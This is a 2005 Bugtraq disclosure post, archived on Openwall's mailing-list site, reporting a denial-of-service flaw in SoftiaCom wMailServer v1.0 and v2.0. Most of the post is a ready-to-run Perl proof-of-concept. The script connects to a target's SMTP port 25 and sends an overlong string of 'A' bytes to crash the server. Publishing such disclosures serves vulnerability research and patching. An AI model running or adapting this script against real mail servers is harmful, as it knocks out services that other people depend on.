lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050712172650.1315.qmail@securityfocus.com>
Date: 12 Jul 2005 17:26:50 -0000
From: unsecure@...teme.com
To: bugtraq@...urityfocus.com
Subject: SoftiaCom MailServer v2.0 - Denial Of Service


SoftiaCom MailServer v2.0 - Denial Of Service

Software: wMailServer
Corporation: SoftiaCom Software
Version: v1.0 (v2.0 is the same...)
Vulnerability: Denial of Service


------------------------------------------


BACKGROUND
__________


SoftiaCom design and build software utilities in communication and network server.

WMailserver is an internet email server able to listin in the appropriate mail port
to fetch incoming emails from the net. You can add users and manage them, avoid spam.


Source: www.softiacom.com



Proof of Concept
________________


#!/usr/bin/perl
# -----------------------------------------------------
# Vulnerability: Denial Of Service - Crash
# Discovered on: July 9, 2005
# Coded by: fRoGGz - SecuBox Labs
# Severity: Normal
# -----------------------------------------------------

$boulet = $ARGV[0];

use IO::Socket;
print "\n\nSoftiaCom Software - wMailServer v1.0\r\n";
print "Denial Of Service - Crash Vulnerability\r\n";
print "---------------------------------------------\r\n";
print "Discovered & coded by fRoGGz - SecuBox Labs\r\n\n";
if(!$ARGV[0]) {
die "Utilisation: ./wms_poc.pl <ip>\n";
}

print "[ ] Connexion sur $boulet\n";
my($suckette) = "";
if ($suckette = IO::Socket::INET->new(PeerAddr => $boulet,PeerPort => "25",Proto => "TCP"))
{
print $suckette " " . "\x41" x 539 . "\r\n";
print "[ ] Emission du paquet malicieux ...\n";
sleep 2;
close $suckette;
print "[ ] Mission termin&#233;e !\n\n";
}
else
{
print "[-] Impossible de se connecter sur $boulet\n";
}




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ